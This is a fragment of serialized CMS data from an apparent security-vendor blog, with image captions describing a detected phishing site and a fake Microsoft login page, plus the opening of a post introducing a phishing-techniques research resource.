,[46187],{"type":899},{"data":46189,"content":46190,"nodeType":860},{},[46191,46194,46201,46204,46211],{"data":46192,"marks":46193,"value":40681,"nodeType":864},{},[],{"data":46195,"content":46196,"nodeType":883},{"uri":40684},[46197],{"data":46198,"marks":46199,"value":28189,"nodeType":864},{},[46200],{"type":1455},{"data":46202,"marks":46203,"value":40693,"nodeType":864},{},[],{"data":46205,"content":46206,"nodeType":883},{"uri":40537},[46207],{"data":46208,"marks":46209,"value":40543,"nodeType":864},{},[46210],{"type":1455},{"data":46212,"marks":46213,"value":40704,"nodeType":864},{},[],{"data":46215,"content":46218,"nodeType":996},{"target":46216},{"sys":46217},{"id":40709,"type":1001,"linkType":1002},[],{"data":46220,"content":46221,"nodeType":1005},{},[],{"data":46223,"content":46224,"nodeType":1009},{},[46225],{"data":46226,"marks":46227,"value":30578,"nodeType":864},{},[46228],{"type":899},{"data":46230,"content":46231,"nodeType":860},{},[46232,46235,46242],{"data":46233,"marks":46234,"value":40727,"nodeType":864},{},[],{"data":46236,"content":46237,"nodeType":883},{"uri":40730},[46238],{"data":46239,"marks":46240,"value":40736,"nodeType":864},{},[46241],{"type":1455},{"data":46243,"marks":46244,"value":40740,"nodeType":864},{},[],{"data":46246,"content":46247,"nodeType":860},{},[46248,46251,46258],{"data":46249,"marks":46250,"value":40747,"nodeType":864},{},[],{"data":46252,"content":46253,"nodeType":883},{"uri":40750},[46254],{"data":46255,"marks":46256,"value":40756,"nodeType":864},{},[46257],{"type":1455},{"data":46259,"marks":46260,"value":40760,"nodeType":864},{},[],{"data":46262,"content":46263,"nodeType":860},{},[46264,46267,46274,46277,46284],{"data":46265,"marks":46266,"value":40767,"nodeType":864},{},[],{"data":46268,"content":46269,"nodeType":883},{"uri":40508},[46270],{"data":46271,"marks":46272,"value":441,"nodeType":864},{},[46273],{"type":1455},{"data":46275,"marks":46276,"value":40778,"nodeType":864},{},[],{"data":46278,"content":46279,"nodeType":883},{"uri":20983},[46280],{"data":46281,"marks":46282,"value":40786,"nodeType":864},{},[46283],{"type":1455},{"data":46285,"marks":46286,"value":40790,"nodeType":864},{},[],{"data":46288,"content":46291,"nodeType":996},{"target":46289},{"sys":46290},{"id":27224,"type":1001,"linkType":1002},[],{"data":46293,"content":46294,"nodeType":1005},{},[],{"data":46296,"content":46297,"nodeType":1009},{},[46298],{"data":46299,"marks":46300,"value":40806,"nodeType":864},{},[46301],{"type":899},{"data":46303,"content":46304,"nodeType":860},{},[46305],{"data":46306,"marks":46307,"value":40813,"nodeType":864},{},[],{"data":46309,"content":46310,"nodeType":941},{},[46311,46320,46339],{"data":46312,"content":46313,"nodeType":945},{},[46314],{"data":46315,"content":46316,"nodeType":860},{},[46317],{"data":46318,"marks":46319,"value":40826,"nodeType":864},{},[],{"data":46321,"content":46322,"nodeType":945},{},[46323],{"data":46324,"content":46325,"nodeType":860},{},[46326,46329,46336],{"data":46327,"marks":46328,"value":40836,"nodeType":864},{},[],{"data":46330,"content":46331,"nodeType":883},{"uri":40537},[46332],{"data":46333,"marks":46334,"value":40543,"nodeType":864},{},[46335],{"type":1455},{"data":46337,"marks":46338,"value":40847,"nodeType":864},{},[],{"data":46340,"content":46341,"nodeType":945},{},[46342],{"data":46343,"content":46344,"nodeType":860},{},[46345,46348,46355,46358,46365,46368,46375,46378,46385],{"data":46346,"marks":46347,"value":40857,"nodeType":864},{},[],{"data":46349,"content":46350,"nodeType":883},{"uri":40860},[46351],{"data":46352,"marks":46353,"value":40866,"nodeType":864},{},[46354],{"type":1455},{"data":46356,"marks":46357,"value":3731,"nodeType":864},{},[],{"data":46359,"content":46360,"nodeType":883},{"uri":40872},[46361],{"data":46362,"marks":46363,"value":40878,"nodeType":864},{},[46364],{"type":1455},{"data":46366,"marks":46367,"value":3731,"nodeType":864},{},[],{"data":46369,"content":46370,"nodeType":883},{"uri":40884},[46371],{"data":46372,"marks":46373,"value":40890,"nodeType":864},{},[46374],{"type":1455},{"data":46376,"marks":46377,"value":10291,"nodeType":864},{},[],{"data":46379,"content":46380,"nodeType":883},{"uri":40896},[46381],{"data":46382,"marks":46383,"value":40902,"nodeType":864},{},[46384],{"type":1455},{"data":46386,"marks":46387,"value":40906,"nodeType":864},{},[],{"data":46389,"content":46390,"nodeType":1005},{},[],{"data":46392,"content":46393,"nodeType":1009},{},[46394],{"data":46395,"marks":46396,"value":3578,"nodeType":864},{},[46397],{"type":899},{"data":46399,"content":46400,"nodeType":860},{},[46401,46404,46410],{"data":46402,"marks":46403,"value":40923,"nodeType":864},{},[],{"data":46405,"content":46406,"nodeType":883},{"uri":7124},[46407],{"data":46408,"marks":46409,"value":28345,"nodeType":864},{},[],{"data":46411,"marks":46412,"value":39845,"nodeType":864},{},[],{"data":46414,"content":46415,"nodeType":860},{},[46416],{"data":46417,"marks":46418,"value":40939,"nodeType":864},{},[],{"data":46420,"content":46421,"nodeType":860},{},[46422],{"data":46423,"marks":46424,"value":40946,"nodeType":864},{},[],{"data":46426,"content":46427,"nodeType":860},{},[46428,46431,46438],{"data":46429,"marks":46430,"value":40953,"nodeType":864},{},[],{"data":46432,"content":46433,"nodeType":883},{"uri":5642},[46434],{"data":46435,"marks":46436,"value":40961,"nodeType":864},{},[46437],{"type":1455},{"data":46439,"marks":46440,"value":21,"nodeType":864},{},[],{"entries":46442},{"hyperlink":46443,"inline":46444,"block":46445},[],[],[46446,46453,46459,46465,46471],{"sys":46447,"__typename":1724,"title":46448,"caption":46448,"layoutMode":59,"file":46449},{"id":40474},"Timeline from the detection event — in this case, the control was configured in “monitor” mode, so it was not automatically blocked. ",{"url":46450,"width":46451,"height":46452},"https://images.ctfassets.net/y1cdw1ablpvd/40mzFhR7ZwbsVhuVQBPtmo/ffb413710cdcde1879b1246b140528da/image4.png",1818,1536,{"sys":46454,"__typename":1724,"title":46455,"caption":46455,"layoutMode":59,"file":46456},{"id":40645},"The authorization request being passed to the ADFS server for bluegraintours.",{"url":46457,"width":1736,"height":46458},"https://images.ctfassets.net/y1cdw1ablpvd/29R1ECNuEmmzH61DIdZPNL/011f52d836662fb9e384880718ee6588/image2.png",818,{"sys":46460,"__typename":1724,"title":46461,"caption":46461,"layoutMode":59,"file":46462},{"id":40658},"Screen capture of the bluegraintours site, includes a fake blog with entries from \"John Doe\" and \"Jane Smith\" as well as fake addresses which were definite giveaways that this is a fake, likely AI-generated site.",{"url":46463,"width":1736,"height":46464},"https://images.ctfassets.net/y1cdw1ablpvd/1W3XqoHwF8BrQ71EbiG0MH/a07ca08d9c4395007104109466b9a336/image1.png",861,{"sys":46466,"__typename":1724,"title":46467,"caption":46467,"layoutMode":59,"file":46468},{"id":40709},"The very standard-looking malicious Microsoft login page. ",{"url":46469,"width":1736,"height":46470},"https://images.ctfassets.net/y1cdw1ablpvd/4kchCJSXKscISpZir2PJA9/4eb30043165a6a6ad27a7c74326832a5/image3.png",1320,{"sys":46472,"__typename":1717,"type":1718,"ctaText":30103,"buttonLabel":1720,"buttonColour":1721,"buttonUrl":30037},{"id":27224},{"items":46474},[],{},"Attackers are using legit Microsoft services for phishing",{"items":46478},[46479,46871,47354],{"__typename":2059,"sys":46480,"content":46481,"title":38789,"synopsis":40992,"hashTags":59,"publishedDate":39328,"slug":40979,"tagsCollection":46861,"authorsCollection":46867},{"id":40994},{"json":46482},{"data":46483,"content":46484,"nodeType":856},{},[46485,46501,46514,46519,46525,46531,46534,46541,46556,46562,46567,46573,46578,46584,46589,46595,46600,46606,46611,46614,46621,46637,46642,46649,46665,46672,46698,46704,46711,46727,46734,46750,46755,46758,46765,46781,46787,46792,46795,46802,46818,46824,46830,46835],{"data":46486,"content":46487,"nodeType":860},{},[46488,46491,46498],{"data":46489,"marks":46490,"value":38805,"nodeType":864},{},[],{"data":46492,"content":46493,"nodeType":883},{"uri":7124},[46494],{"data":46495,"marks":46496,"value":13810,"nodeType":864},{},[46497],{"type":1455},{"data":46499,"marks":46500,"value":10094,"nodeType":864},{},[],{"data":46502,"content":46503,"nodeType":860},{},[46504,46507,46511],{"data":46505,"marks":46506,"value":38822,"nodeType":864},{},[],{"data":46508,"marks":46509,"value":38827,"nodeType":864},{},[46510],{"type":899},{"data":46512,"marks":46513,"value":38831,"nodeType":864},{},[],{"data":46515,"content":46518,"nodeType":996},{"target":46516},{"sys":46517},{"id":38836,"type":1001,"linkType":1002},[],{"data":46520,"content":46521,"nodeType":860},{},[46522],{"data":46523,"marks":46524,"value":38844,"nodeType":864},{},[],{"data":46526,"content":46527,"nodeType":860},{},[46528],{"data":46529,"marks":46530,"value":38851,"nodeType":864},{},[],{"data":46532,"content":46533,"nodeType":1005},{},[],{"data":46535,"content":46536,"nodeType":1009},{},[46537],{"data":46538,"marks":46539,"value":38862,"nodeType":864},{},[46540],{"type":899},{"data":46542,"content":46543,"nodeType":860},{},[46544,46547,46553],{"data":46545,"marks":46546,"value":38869,"nodeType":864},{},[],{"data":46548,"content":46549,"nodeType":883},{"uri":38872},[46550],{"data":46551,"marks":46552,"value":38877,"nodeType":864},{},[],{"data":46554,"marks":46555,"value":1171,"nodeType":864},{},[],{"data":46557,"content":46558,"nodeType":860},{},[46559],{"data":46560,"marks":46561,"value":38887,"nodeType":864},{},[],{"data":46563,"content":46566,"nodeType":996},{"target":46564},{"sys":46565},{"id":38892,"type":1001,"linkType":1002},[],{"data":46568,"content":46569,"nodeType":860},{},[46570],{"data":46571,"marks":46572,"value":38900,"nodeType":864},{},[],{"data":46574,"content":46577,"nodeType":996},{"target":46575},{"sys":46576},{"id":38905,"type":1001,"linkType":1002},[],{"data":46579,"content":46580,"nodeType":860},{},[46581],{"data":46582,"marks":46583,"value":38913,"nodeType":864},{},[],{"data":46585,"content":46588,"nodeType":996},{"target":46586},{"sys":46587},{"id":38918,"type":1001,"linkType":1002},[],{"data":46590,"content":46591,"nodeType":860},{},[46592],{"data":46593,"marks":46594,"value":38926,"nodeType":864},{},[],{"data":46596,"content":46599,"nodeType":996},{"target":46597},{"sys":46598},{"id":38931,"type":1001,"linkType":1002},[],{"data":46601,"content":46602,"nodeType":860},{},[46603],{"data":46604,"marks":46605,"value":38939,"nodeType":864},{},[],{"data":46607,"content":46610,"nodeType":996},{"target":46608},{"sys":46609},{"id":38944,"type":1001,"linkType":1002},[],{"data":46612,"content":46613,"nodeType":1005},{},[],{"data":46615,"content":46616,"nodeType":1009},{},[46617],{"data":46618,"marks":46619,"value":38956,"nodeType":864},{},[46620],{"type":899},{"data":46622,"content":46623,"nodeType":860},{},[46624,46627,46634],{"data":46625,"marks":46626,"value":38963,"nodeType":864},{},[],{"data":46628,"content":46629,"nodeType":883},{"uri":7124},[46630],{"data":46631,"marks":46632,"value":13810,"nodeType":864},{},[46633],{"type":1455},{"data":46635,"marks":46636,"value":38974,"nodeType":864},{},[],{"data":46638,"content":46641,"nodeType":996},{"target":46639},{"sys":46640},{"id":38979,"type":1001,"linkType":1002},[],{"data":46643,"content":46644,"nodeType":1312},{},[46645],{"data":46646,"marks":46647,"value":38988,"nodeType":864},{},[46648],{"type":899},{"data":46650,"content":46651,"nodeType":860},{},[46652,46655,46662],{"data":46653,"marks":46654,"value":38995,"nodeType":864},{},[],{"data":46656,"content":46657,"nodeType":883},{"uri":38998},[46658],{"data":46659,"marks":46660,"value":39004,"nodeType":864},{},[46661],{"type":1455},{"data":46663,"marks":46664,"value":39008,"nodeType":864},{},[],{"data":46666,"content":46667,"nodeType":1312},{},[46668],{"data":46669,"marks":46670,"value":39016,"nodeType":864},{},[46671],{"type":899},{"data":46673,"content":46674,"nodeType":860},{},[46675,46678,46685,46688,46695],{"data":46676,"marks":46677,"value":39023,"nodeType":864},{},[],{"data":46679,"content":46680,"nodeType":883},{"uri":7248},[46681],{"data":46682,"marks":46683,"value":39031,"nodeType":864},{},[46684],{"type":1455},{"data":46686,"marks":46687,"value":39035,"nodeType":864},{},[],{"data":46689,"content":46690,"nodeType":883},{"uri":39038},[46691],{"data":46692,"marks":46693,"value":39044,"nodeType":864},{},[46694],{"type":1455},{"data":46696,"marks":46697,"value":39048,"nodeType":864},{},[],{"data":46699,"content":46700,"nodeType":860},{},[46701],{"data":46702,"marks":46703,"value":39055,"nodeType":864},{},[],{"data":46705,"content":46706,"nodeType":1312},{},[46707],{"data":46708,"marks":46709,"value":39063,"nodeType":864},{},[46710],{"type":899},{"data":46712,"content":46713,"nodeType":860},{},[46714,46717,46724],{"data":46715,"marks":46716,"value":35534,"nodeType":864},{},[],{"data":46718,"content":46719,"nodeType":883},{"uri":35537},[46720],{"data":46721,"marks":46722,"value":35543,"nodeType":864},{},[46723],{"type":1455},{"data":46725,"marks":46726,"value":35547,"nodeType":864},{},[],{"data":46728,"content":46729,"nodeType":1312},{},[46730],{"data":46731,"marks":46732,"value":39087,"nodeType":864},{},[46733],{"type":899},{"data":46735,"content":46736,"nodeType":860},{},[46737,46740,46747],{"data":46738,"marks":46739,"value":39094,"nodeType":864},{},[],{"data":46741,"content":46742,"nodeType":883},{"uri":35636},[46743],{"data":46744,"marks":46745,"value":39102,"nodeType":864},{},[46746],{"type":1455},{"data":46748,"marks":46749,"value":39106,"nodeType":864},{},[],{"data":46751,"content":46754,"nodeType":996},{"target":46752},{"sys":46753},{"id":39111,"type":1001,"linkType":1002},[],{"data":46756,"content":46757,"nodeType":1005},{},[],{"data":46759,"content":46760,"nodeType":1009},{},[46761],{"data":46762,"marks":46763,"value":7114,"nodeType":864},{},[46764],{"type":899},{"data":46766,"content":46767,"nodeType":860},{},[46768,46771,46778],{"data":46769,"marks":46770,"value":39129,"nodeType":864},{},[],{"data":46772,"content":46773,"nodeType":883},{"uri":39132},[46774],{"data":46775,"marks":46776,"value":39138,"nodeType":864},{},[46777],{"type":1455},{"data":46779,"marks":46780,"value":39142,"nodeType":864},{},[],{"data":46782,"content":46783,"nodeType":860},{},[46784],{"data":46785,"marks":46786,"value":39149,"nodeType":864},{},[],{"data":46788,"content":46791,"nodeType":996},{"target":46789},{"sys":46790},{"id":27224,"type":1001,"linkType":1002},[],{"data":46793,"content":46794,"nodeType":1005},{},[],{"data":46796,"content":46797,"nodeType":1009},{},[46798],{"data":46799,"marks":46800,"value":21018,"nodeType":864},{},[46801],{"type":899},{"data":46803,"content":46804,"nodeType":860},{},[46805,46808,46815],{"data":46806,"marks":46807,"value":28337,"nodeType":864},{},[],{"data":46809,"content":46810,"nodeType":883},{"uri":7124},[46811],{"data":46812,"marks":46813,"value":28345,"nodeType":864},{},[46814],{"type":1455},{"data":46816,"marks":46817,"value":28349,"nodeType":864},{},[],{"data":46819,"content":46820,"nodeType":860},{},[46821],{"data":46822,"marks":46823,"value":28356,"nodeType":864},{},[],{"data":46825,"content":46826,"nodeType":860},{},[46827],{"data":46828,"marks":46829,"value":39193,"nodeType":864},{},[],{"data":46831,"content":46834,"nodeType":996},{"target":46832},{"sys":46833},{"id":39198,"type":1001,"linkType":1002},[],{"data":46836,"content":46837,"nodeType":860},{},[46838,46841,46848,46851,46858],{"data":46839,"marks":46840,"value":16314,"nodeType":864},{},[],{"data":46842,"content":46843,"nodeType":883},{"uri":10269},[46844],{"data":46845,"marks":46846,"value":10275,"nodeType":864},{},[46847],{"type":1455},{"data":46849,"marks":46850,"value":19754,"nodeType":864},{},[],{"data":46852,"content":46853,"nodeType":883},{"uri":1700},[46854],{"data":46855,"marks":46856,"value":10299,"nodeType":864},{},[46857],{"type":1455},{"data":46859,"marks":46860,"value":2924,"nodeType":864},{},[],{"items":46862},[46863,46865],{"sys":46864,"name":342},{"id":6596},{"sys":46866,"name":6593},{"id":6592},{"items":46868},[46869],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":46870},{"url":2740},{"__typename":2059,"sys":46872,"content":46873,"title":35812,"synopsis":35813,"hashTags":59,"publishedDate":35814,"slug":35815,"tagsCollection":47344,"authorsCollection":47350},{"id":35267},{"json":46874},{"data":46875,"content":46876,"nodeType":856},{},[46877,46883,46889,46915,46921,46927,46933,46936,46943,46959,46965,46970,46976,46981,46987,46992,46998,47003,47009,47014,47020,47026,47031,47034,47041,47057,47063,47069,47074,47090,47097,47113,47120,47136,47142,47147,47173,47180,47206,47213,47229,47234,47237,47244,47260,47265,47268,47275,47281,47287,47290,47297,47303,47309,47333,47338],{"data":46878,"content":46879,"nodeType":860},{},[46880],{"data":46881,"marks":46882,"value":35278,"nodeType":864},{},[],{"data":46884,"content":46885,"nodeType":860},{},[46886],{"data":46887,"marks":46888,"value":26797,"nodeType":864},{},[],{"data":46890,"content":46891,"nodeType":860},{},[46892,46895,46902,46905,46912],{"data":46893,"marks":46894,"value":35291,"nodeType":864},{},[],{"data":46896,"content":46897,"nodeType":883},{"uri":35294},[46898],{"data":46899,"marks":46900,"value":26813,"nodeType":864},{},[46901],{"type":1455},{"data":46903,"marks":46904,"value":2232,"nodeType":864},{},[],{"data":46906,"content":46907,"nodeType":883},{"uri":7124},[46908],{"data":46909,"marks":46910,"value":13810,"nodeType":864},{},[46911],{"type":1455},{"data":46913,"marks":46914,"value":35313,"nodeType":864},{},[],{"data":46916,"content":46917,"nodeType":860},{},[46918],{"data":46919,"marks":46920,"value":35320,"nodeType":864},{},[],{"data":46922,"content":46923,"nodeType":860},{},[46924],{"data":46925,"marks":46926,"value":35327,"nodeType":864},{},[],{"data":46928,"content":46929,"nodeType":860},{},[46930],{"data":46931,"marks":46932,"value":35334,"nodeType":864},{},[],{"data":46934,"content":46935,"nodeType":1005},{},[],{"data":46937,"content":46938,"nodeType":1009},{},[46939],{"data":46940,"marks":46941,"value":35345,"nodeType":864},{},[46942],{"type":899},{"data":46944,"content":46945,"nodeType":860},{},[46946,46949,46956],{"data":46947,"marks":46948,"value":35352,"nodeType":864},{},[],{"data":46950,"content":46951,"nodeType":883},{"uri":35355},[46952],{"data":46953,"marks":46954,"value":35361,"nodeType":864},{},[46955],{"type":1455},{"data":46957,"marks":46958,"value":35365,"nodeType":864},{},[],{"data":46960,"content":46961,"nodeType":860},{},[46962],{"data":46963,"marks":46964,"value":35372,"nodeType":864},{},[],{"data":46966,"content":46969,"nodeType":996},{"target":46967},{"sys":46968},{"id":35377,"type":1001,"linkType":1002},[],{"data":46971,"content":46972,"nodeType":860},{},[46973],{"data":46974,"marks":46975,"value":35385,"nodeType":864},{},[],{"data":46977,"content":46980,"nodeType":996},{"target":46978},{"sys":46979},{"id":35390,"type":1001,"linkType":1002},[],{"data":46982,"content":46983,"nodeType":860},{},[46984],{"data":46985,"marks":46986,"value":35398,"nodeType":864},{},[],{"data":46988,"content":46991,"nodeType":996},{"target":46989},{"sys":46990},{"id":35403,"type":1001,"linkType":1002},[],{"data":46993,"content":46994,"nodeType":860},{},[46995],{"data":46996,"marks":46997,"value":35411,"nodeType":864},{},[],{"data":46999,"content":47002,"nodeType":996},{"target":47000},{"sys":47001},{"id":35416,"type":1001,"linkType":1002},[],{"data":47004,"content":47005,"nodeType":860},{},[47006],{"data":47007,"marks":47008,"value":35424,"nodeType":864},{},[],{"data":47010,"content":47013,"nodeType":996},{"target":47011},{"sys":47012},{"id":35429,"type":1001,"linkType":1002},[],{"data":47015,"content":47016,"nodeType":860},{},[47017],{"data":47018,"marks":47019,"value":35437,"nodeType":864},{},[],{"data":47021,"content":47022,"nodeType":860},{},[47023],{"data":47024,"marks":47025,"value":35444,"nodeType":864},{},[],{"data":47027,"content":47030,"nodeType":996},{"target":47028},{"sys":47029},{"id":35449,"type":1001,"linkType":1002},[],{"data":47032,"content":47033,"nodeType":1005},{},[],{"data":47035,"content":47036,"nodeType":1009},{},[47037],{"data":47038,"marks":47039,"value":35461,"nodeType":864},{},[47040],{"type":899},{"data":47042,"content":47043,"nodeType":860},{},[47044,47047,47054],{"data":47045,"marks":47046,"value":35468,"nodeType":864},{},[],{"data":47048,"content":47049,"nodeType":883},{"uri":35471},[47050],{"data":47051,"marks":47052,"value":35477,"nodeType":864},{},[47053],{"type":1455},{"data":47055,"marks":47056,"value":35481,"nodeType":864},{},[],{"data":47058,"content":47059,"nodeType":860},{},[47060],{"data":47061,"marks":47062,"value":35488,"nodeType":864},{},[],{"data":47064,"content":47065,"nodeType":860},{},[47066],{"data":47067,"marks":47068,"value":35495,"nodeType":864},{},[],{"data":47070,"content":47073,"nodeType":996},{"target":47071},{"sys":47072},{"id":35500,"type":1001,"linkType":1002},[],{"data":47075,"content":47076,"nodeType":860},{},[47077,47080,47087],{"data":47078,"marks":47079,"value":35508,"nodeType":864},{},[],{"data":47081,"content":47082,"nodeType":883},{"uri":7124},[47083],{"data":47084,"marks":47085,"value":13810,"nodeType":864},{},[47086],{"type":1455},{"data":47088,"marks":47089,"value":35519,"nodeType":864},{},[],{"data":47091,"content":47092,"nodeType":1312},{},[47093],{"data":47094,"marks":47095,"value":35527,"nodeType":864},{},[47096],{"type":899},{"data":47098,"content":47099,"nodeType":860},{},[47100,47103,47110],{"data":47101,"marks":47102,"value":35534,"nodeType":864},{},[],{"data":47104,"content":47105,"nodeType":883},{"uri":35537},[47106],{"data":47107,"marks":47108,"value":35543,"nodeType":864},{},[47109],{"type":1455},{"data":47111,"marks":47112,"value":35547,"nodeType":864},{},[],{"data":47114,"content":47115,"nodeType":1312},{},[47116],{"data":47117,"marks":47118,"value":35555,"nodeType":864},{},[47119],{"type":899},{"data":47121,"content":47122,"nodeType":860},{},[47123,47126,47133],{"data":47124,"marks":47125,"value":21,"nodeType":864},{},[],{"data":47127,"content":47128,"nodeType":883},{"uri":26883},[47129],{"data":47130,"marks":47131,"value":35569,"nodeType":864},{},[47132],{"type":1455},{"data":47134,"marks":47135,"value":35573,"nodeType":864},{},[],{"data":47137,"content":47138,"nodeType":860},{},[47139],{"data":47140,"marks":47141,"value":35580,"nodeType":864},{},[],{"data":47143,"content":47146,"nodeType":996},{"target":47144},{"sys":47145},{"id":35585,"type":1001,"linkType":1002},[],{"data":47148,"content":47149,"nodeType":860},{},[47150,47153,47160,47163,47170],{"data":47151,"marks":47152,"value":35593,"nodeType":864},{},[],{"data":47154,"content":47155,"nodeType":883},{"uri":29155},[47156],{"data":47157,"marks":47158,"value":35601,"nodeType":864},{},[47159],{"type":1455},{"data":47161,"marks":47162,"value":35605,"nodeType":864},{},[],{"data":47164,"content":47165,"nodeType":883},{"uri":35608},[47166],{"data":47167,"marks":47168,"value":35614,"nodeType":864},{},[47169],{"type":1455},{"data":47171,"marks":47172,"value":35618,"nodeType":864},{},[],{"data":47174,"content":47175,"nodeType":1312},{},[47176],{"data":47177,"marks":47178,"value":35626,"nodeType":864},{},[47179],{"type":899},{"data":47181,"content":47182,"nodeType":860},{},[47183,47186,47193,47196,47203],{"data":47184,"marks":47185,"value":35633,"nodeType":864},{},[],{"data":47187,"content":47188,"nodeType":883},{"uri":35636},[47189],{"data":47190,"marks":47191,"value":35642,"nodeType":864},{},[47192],{"type":1455},{"data":47194,"marks":47195,"value":35646,"nodeType":864},{},[],{"data":47197,"content":47198,"nodeType":883},{"uri":35649},[47199],{"data":47200,"marks":47201,"value":35655,"nodeType":864},{},[47202],{"type":1455},{"data":47204,"marks":47205,"value":35659,"nodeType":864},{},[],{"data":47207,"content":47208,"nodeType":1312},{},[47209],{"data":47210,"marks":47211,"value":35667,"nodeType":864},{},[47212],{"type":899},{"data":47214,"content":47215,"nodeType":860},{},[47216,47219,47226],{"data":47217,"marks":47218,"value":35674,"nodeType":864},{},[],{"data":47220,"content":47221,"nodeType":883},{"uri":35677},[47222],{"data":47223,"marks":47224,"value":35683,"nodeType":864},{},[47225],{"type":1455},{"data":47227,"marks":47228,"value":35687,"nodeType":864},{},[],{"data":47230,"content":47233,"nodeType":996},{"target":47231},{"sys":47232},{"id":27224,"type":1001,"linkType":1002},[],{"data":47235,"content":47236,"nodeType":1005},{},[],{"data":47238,"content":47239,"nodeType":1009},{},[47240],{"data":47241,"marks":47242,"value":35703,"nodeType":864},{},[47243],{"type":899},{"data":47245,"content":47246,"nodeType":860},{},[47247,47250,47257],{"data":47248,"marks":47249,"value":35710,"nodeType":864},{},[],{"data":47251,"content":47252,"nodeType":883},{"uri":35713},[47253],{"data":47254,"marks":47255,"value":35719,"nodeType":864},{},[47256],{"type":1455},{"data":47258,"marks":47259,"value":35723,"nodeType":864},{},[],{"data":47261,"content":47264,"nodeType":996},{"target":47262},{"sys":47263},{"id":35728,"type":1001,"linkType":1002},[],{"data":47266,"content":47267,"nodeType":1005},{},[],{"data":47269,"content":47270,"nodeType":1009},{},[47271],{"data":47272,"marks":47273,"value":24968,"nodeType":864},{},[47274],{"type":899},{"data":47276,"content":47277,"nodeType":860},{},[47278],{"data":47279,"marks":47280,"value":35746,"nodeType":864},{},[],{"data":47282,"content":47283,"nodeType":860},{},[47284],{"data":47285,"marks":47286,"value":35753,"nodeType":864},{},[],{"data":47288,"content":47289,"nodeType":1005},{},[],{"data":47291,"content":47292,"nodeType":1009},{},[47293],{"data":47294,"marks":47295,"value":17636,"nodeType":864},{},[47296],{"type":899},{"data":47298,"content":47299,"nodeType":860},{},[47300],{"data":47301,"marks":47302,"value":29331,"nodeType":864},{},[],{"data":47304,"content":47305,"nodeType":860},{},[47306],{"data":47307,"marks":47308,"value":35776,"nodeType":864},{},[],{"data":47310,"content":47311,"nodeType":860},{},[47312,47315,47321,47324,47330],{"data":47313,"marks":47314,"value":16314,"nodeType":864},{},[],{"data":47316,"content":47317,"nodeType":883},{"uri":10269},[47318],{"data":47319,"marks":47320,"value":10275,"nodeType":864},{},[],{"data":47322,"marks":47323,"value":19754,"nodeType":864},{},[],{"data":47325,"content":47326,"nodeType":883},{"uri":1700},[47327],{"data":47328,"marks":47329,"value":10299,"nodeType":864},{},[],{"data":47331,"marks":47332,"value":2924,"nodeType":864},{},[],{"data":47334,"content":47337,"nodeType":996},{"target":47335},{"sys":47336},{"id":27224,"type":1001,"linkType":1002},[],{"data":47339,"content":47340,"nodeType":860},{},[47341],{"data":47342,"marks":47343,"value":21,"nodeType":864},{},[],{"items":47345},[47346,47348],{"sys":47347,"name":6593},{"id":6592},{"sys":47349,"name":342},{"id":6596},{"items":47351},[47352],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":47353},{"url":2740},{"__typename":2059,"sys":47355,"content":47357,"title":47902,"synopsis":47903,"hashTags":59,"publishedDate":47904,"slug":47905,"tagsCollection":47906,"authorsCollection":47912},{"id":47356},"4XZ6qCr8pjJvcD7hi09x2Y",{"json":47358},{"data":47359,"content":47360,"nodeType":856},{},[47361,47380,47387,47410,47417,47424,47431,47451,47457,47460,47468,47475,47495,47538,47581,47611,47631,47636,47639,47647,47654,47661,47668,47675,47798,47805,47808,47815,47832,47849,47852,47860,47877,47884],{"data":47362,"content":47363,"nodeType":860},{},[47364,47368,47376],{"data":47365,"marks":47366,"value":47367,"nodeType":864},{},[],"Almost two years ago, we released our ",{"data":47369,"content":47370,"nodeType":883},{"uri":6418},[47371],{"data":47372,"marks":47373,"value":47375,"nodeType":864},{},[47374],{"type":1455},"SaaS attacks matrix",{"data":47377,"marks":47378,"value":47379,"nodeType":864},{},[]," on GitHub. At the time, our research into modern attack patterns showed us that attackers were increasingly relying on cloud-native techniques, taking advantage of the shift in business IT from traditional on-premise networks to a web of third-party services accessed over the internet. ",{"data":47381,"content":47382,"nodeType":860},{},[47383],{"data":47384,"marks":47385,"value":47386,"nodeType":864},{},[],"As part of our work in maintaining and updating the SaaS attacks matrix in line with our own research and attacks in the wild, we identified that:",{"data":47388,"content":47389,"nodeType":941},{},[47390,47400],{"data":47391,"content":47392,"nodeType":945},{},[47393],{"data":47394,"content":47395,"nodeType":860},{},[47396],{"data":47397,"marks":47398,"value":47399,"nodeType":864},{},[],"The fastest growing category since day 1 has been initial access, which is entirely driven by identity-based techniques (i.e. logging into apps).",{"data":47401,"content":47402,"nodeType":945},{},[47403],{"data":47404,"content":47405,"nodeType":860},{},[47406],{"data":47407,"marks":47408,"value":47409,"nodeType":864},{},[],"Phishing in various forms is the most widely used, and generally effective, of all the initial access techniques we encounter. ",{"data":47411,"content":47412,"nodeType":860},{},[47413],{"data":47414,"marks":47415,"value":47416,"nodeType":864},{},[],"It’s increasingly difficult to reflect a lot of the research we’re doing within the parameters of the SaaS attacks matrix when attackers are doing so much (and to varying levels) in how they architect their phishing sites, distribute links and lures, and find novel ways around authentication and access controls. ",{"data":47418,"content":47419,"nodeType":860},{},[47420],{"data":47421,"marks":47422,"value":47423,"nodeType":864},{},[],"Equally, while there’s a huge amount of valuable research and deep-dive analysis of how individual phishing kits are behaving produced by security firms, there’s a gap in how we’re bringing together this knowledge and understanding the broad strokes of why and how phishing attacks are still so successful.  ",{"data":47425,"content":47426,"nodeType":860},{},[47427],{"data":47428,"marks":47429,"value":47430,"nodeType":864},{},[],"We come across so many phishing attacks on a daily basis that it’s impossible to write a deep-dive teardown on every one — and to some extent it wouldn’t be useful to do so. What’s arguably more valuable is understanding the patterns and commonalities across phishing campaigns that can help us to understand, generally, how malicious tooling and tradecraft is evolving. ",{"data":47432,"content":47433,"nodeType":860},{},[47434,47438,47447],{"data":47435,"marks":47436,"value":47437,"nodeType":864},{},[],"So, we decided to ",{"data":47439,"content":47441,"nodeType":883},{"uri":47440},"https://pushsecurity.github.io/phishing-techniques/",[47442],{"data":47443,"marks":47444,"value":47446,"nodeType":864},{},[47445],{"type":1455},"create a new resource",{"data":47448,"marks":47449,"value":47450,"nodeType":864},{},[]," giving phishing the space to breathe that it deserves. 